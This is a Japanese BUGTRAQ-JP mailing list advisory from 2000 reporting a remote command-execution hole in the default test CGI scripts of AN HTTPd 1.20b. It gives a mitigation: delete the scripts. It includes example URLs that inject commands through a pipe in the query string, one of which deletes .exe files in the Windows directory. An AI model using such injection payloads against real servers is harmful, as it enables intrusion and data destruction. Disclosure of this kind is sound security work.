Return-Path: owner-bugtraq-jp@SECURITYFOCUS.COM MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-2022-JP Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver 1.25.07 Message-ID: <39F0A38032.D714SHADOWPENGUIN@fox.nightland.net> Date: Sat, 21 Oct 2000 04:56:48 +0900 Reply-To: UNYUN Sender: BUGTRAQ-JP List From: UNYUN Subject: AN HTTPd 1.20b CGI exploit X-To: BUGTRAQ-JP@SECURITYFOCUS.COM To: BUGTRAQ-JP@SECURITYFOCUS.COM UNYUN@ShadowPenguinSecurityです。 窓の杜(http://www.forest.impress.co.jp/)などで配布されている AN HTTPd Ver1.20b (最新版) のディフォルトで用意されているテスト用CGIプログラム test.bat、およびtest2.batに、リモートから任意のコマンドを実行させる ことができるセキュリティホールがあるようです。 例: http://localhost/cgi-bin/input.bat?|dir..\..\ http://localhost/cgi-bin/input.bat?|del..\..\windows\*.exe test.bat、test2.batを削除することにより、この問題を回避できます。